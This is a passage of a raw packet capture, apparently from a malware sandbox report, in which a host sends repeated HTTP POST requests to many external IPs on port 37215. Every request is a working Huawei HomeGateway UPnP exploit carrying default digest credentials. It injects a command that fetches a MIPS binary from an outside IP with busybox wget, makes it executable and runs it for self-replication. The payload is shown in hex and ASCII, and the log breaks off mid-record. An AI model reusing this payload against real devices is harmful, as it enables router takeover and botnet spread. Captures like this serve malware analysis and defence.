6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  187192.168.2.1336238197.1.229.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.070960045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  188192.168.2.134576041.140.34.14737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.070985079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  189192.168.2.1350214142.96.28.20837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.070997000 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  190192.168.2.1342228186.132.128.2037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.071021080 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  191192.168.2.134986841.166.60.8037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.071027994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  192192.168.2.1344748197.213.248.16837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.071029902 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  193192.168.2.134366841.177.231.23737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.071027994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  194192.168.2.1335284157.176.143.21537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.071455002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  195192.168.2.1351416197.219.157.1737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.071479082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  196192.168.2.1347336157.230.184.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.071479082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  197192.168.2.1337658157.165.76.4837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.071496010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
